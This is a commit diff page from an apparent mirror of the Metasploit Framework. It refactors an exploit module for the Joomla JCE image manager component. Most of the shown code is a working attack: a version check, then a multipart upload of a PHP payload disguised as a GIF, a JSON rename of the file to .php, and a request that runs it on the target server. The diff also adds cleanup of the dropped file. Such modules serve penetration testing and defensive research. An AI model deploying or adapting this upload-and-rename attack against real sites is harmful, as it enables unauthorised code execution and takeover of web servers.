infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

many code adjustments

bug/bundler_fix
heyder 2013-03-22 23:07:08 -03:00
parent b5c65ad51b
commit 5bee1471df
1 changed files with 32 additions and 36 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

68
modules/exploits/multi/http/joomla_comjce_imgmanager.rb
View File

@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -56,17 +57,16 @@ class Metasploit3 < Msf::Exploit::Remote
def get_version def get_version
# check imgmanager version # check imgmanager version
@uri_base = normalize_uri(datastore['URI'], 'index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager') @uri_base = normalize_uri(datastore['URI']) + 'index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager'
uri = '' uri = @uri_base
uri << @uri_base
print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}") print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
res = send_request_cgi( res = send_request_cgi(
{ {
'uri' => uri, 'uri' => uri,
'method' => 'GET', 'method' => 'GET',
'version' => '1.1', 'version' => '1.1'
}, 25) })
if (res and res.code == 200) if (res and res.code == 200)
res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<}) res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<})
@ -95,39 +95,28 @@ class Metasploit3 < Msf::Exploit::Remote
@script_name = rand_text_alpha_lower(6) @script_name = rand_text_alpha_lower(6)
boundary = '-' * 27 + rand_text_numeric(11) boundary = '-' * 27 + rand_text_numeric(11)
uri = '' uri = @uri_base
uri << @uri_base
uri << '&method=form' uri << '&method=form'
# POST data # POST data
data = "--#{boundary}\r\n" post_data = Rex::MIME::Message.new
data << "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n" post_data.bound = boundary
data << "/\r\n" post_data.add_part("/", nil, nil, "form-data; name=\"upload-dir\"")
data << "--#{boundary}\r\n" post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"\"")
data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n" post_data.add_part("0", nil, nil, "form-data; name=\"upload-overwrite\"")
data << "Content-Type: application/octet-stream\r\n\r\n" post_data.add_part("#{cmd_php}", "image/gif", nil, "form-data; name=\"Filedata\"; filename=\"#{@script_name}.gif\"")
data << "\r\n" post_data.add_part("#{@script_name}", nil, nil, "form-data; name=\"upload-name\"")
data << "--#{boundary}\r\n" post_data.add_part("upload", nil, nil, "form-data; name=\"action\"")
data << "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n"
data << "0\r\n" data = post_data.to_s
data << "--#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{@script_name}.gif\"\r\n"
data << "Content-Type: image/gif\r\n\r\n"
data << "#{cmd_php}\r\n"
data << "--#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"upload-name\"\r\n\r\n"
data << "#{@script_name}\r\n"
data << "--#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"action\"\r\n\r\n"
data << "upload\r\n"
data << "--#{boundary}--\r\n\r\n"
res = send_request_cgi({ res = send_request_cgi({
'uri' => uri, 'uri' => uri,
'method' => 'POST', 'method' => 'POST',
'version' => '1.1', 'version' => '1.1',
'data' => data, 'data' => data,
'ctype' => 'multipart/form-data; boundary=' + boundary 'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
}, 25) })
if (res and res.code = 200 ) if (res and res.code = 200 )
return :access_denied if (res.body =~ /RESTRICTED/i) return :access_denied if (res.body =~ /RESTRICTED/i)
@ -143,8 +132,8 @@ class Metasploit3 < Msf::Exploit::Remote
def renamed? def renamed?
# Rename the file from .gif to .php # Rename the file from .gif to .php
uri = '' # uri = ''
uri << @uri_base uri = @uri_base
uri << '&version=1576&cid=20' uri << '&version=1576&cid=20'
data = "json={\"fn\":\"folderRename\",\"args\":[\"/#{@script_name}.gif\",\"#{@script_name}.php\"]}" data = "json={\"fn\":\"folderRename\",\"args\":[\"/#{@script_name}.gif\",\"#{@script_name}.php\"]}"
@ -162,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Remote
{ {
'X-Request' => 'JSON' 'X-Request' => 'JSON'
} }
}, 25) })
if (res and res.code == 200 ) if (res and res.code == 200 )
print_good("Renamed #{@script_name}.gif to #{@script_name}.php") print_good("Renamed #{@script_name}.gif to #{@script_name}.php")
return true return true
@ -177,9 +166,15 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Calling payload: #{@script_name}.php") print_status("Calling payload: #{@script_name}.php")
uri = normalize_uri(datastore['URI']) uri = normalize_uri(datastore['URI'])
uri << directory + @script_name + ".php" uri << directory + @script_name + ".php"
res = send_request_raw({ res = send_request_cgi({
'uri' => uri 'uri' => uri,
}, 25) 'method' => 'GET',
'version' => '1.1'
})
end
def on_new_session
# on_new_session will force stdapi to load (for Linux meterpreter)
end end
def exploit def exploit
@ -188,6 +183,7 @@ class Metasploit3 < Msf::Exploit::Remote
if upload_gif == :success if upload_gif == :success
if renamed? if renamed?
call_payload call_payload
register_files_for_cleanup(@script_name)
end end
end end